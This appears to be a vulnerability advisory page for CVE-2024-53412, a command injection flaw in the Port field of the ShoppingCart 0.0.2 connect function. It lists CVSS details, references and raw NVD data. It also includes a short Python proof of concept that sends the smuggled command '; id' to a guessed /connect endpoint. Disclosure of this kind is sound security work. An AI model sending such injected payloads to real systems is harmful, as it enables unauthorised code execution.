Security Vulnerability Report
CVE-2024-53412 CVSS 8.4 HIGH

CVE-2024-53412

Published: 2026-04-15 15:16:40
Last Modified: 2026-04-27 19:18:47

Description

Command injection in the connect function in NietThijmen ShoppingCart 0.0.2 allows an attacker to execute arbitrary shell commands and achieve remote code execution via injection of malicious payloads into the Port field.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No NVD configuration (CPE) data available; the affected product named in the description is:

NietThijmen ShoppingCart 0.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_cve_2024_53412(target_url):
    """
    Proof of Concept for CVE-2024-53412
    Exploits command injection in the Port field of NietThijmen ShoppingCart.
    """
    # The vulnerable endpoint (adjust based on actual application route)
    endpoint = f"{target_url}/connect"

    # Malicious payload to execute 'id' command via shell injection
    # Using a semicolon to chain commands
    payload = "; id"

    # Prepare data with the injected payload in the 'port' field
    data = {
        "host": "127.0.0.1",
        "port": payload
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, data=data, timeout=5)

        # Check if command execution output is visible in response
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response content:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1:3000"
    exploit_cve_2024_53412(target)
```

References

https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md
https://github.com/NietThijmen/ShoppingCart/issues/1

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2024-53412",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-15T15:16:39.710",
    "lastModified": "2026-04-27T19:18:46.690",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Command injection in the connect function in NietThijmen ShoppingCart 0.0.2 allows an attacker to execute arbitrary shell commands and achieve remote code execution via injection of malicious payloads into the Port field"}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"},
          "exploitabilityScore": 2.5,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}
    ],
    "references": [
      {"url": "https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md", "source": "[email protected]"},
      {"url": "https://github.com/NietThijmen/ShoppingCart/issues/1", "source": "[email protected]"},
      {"url": "https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}
```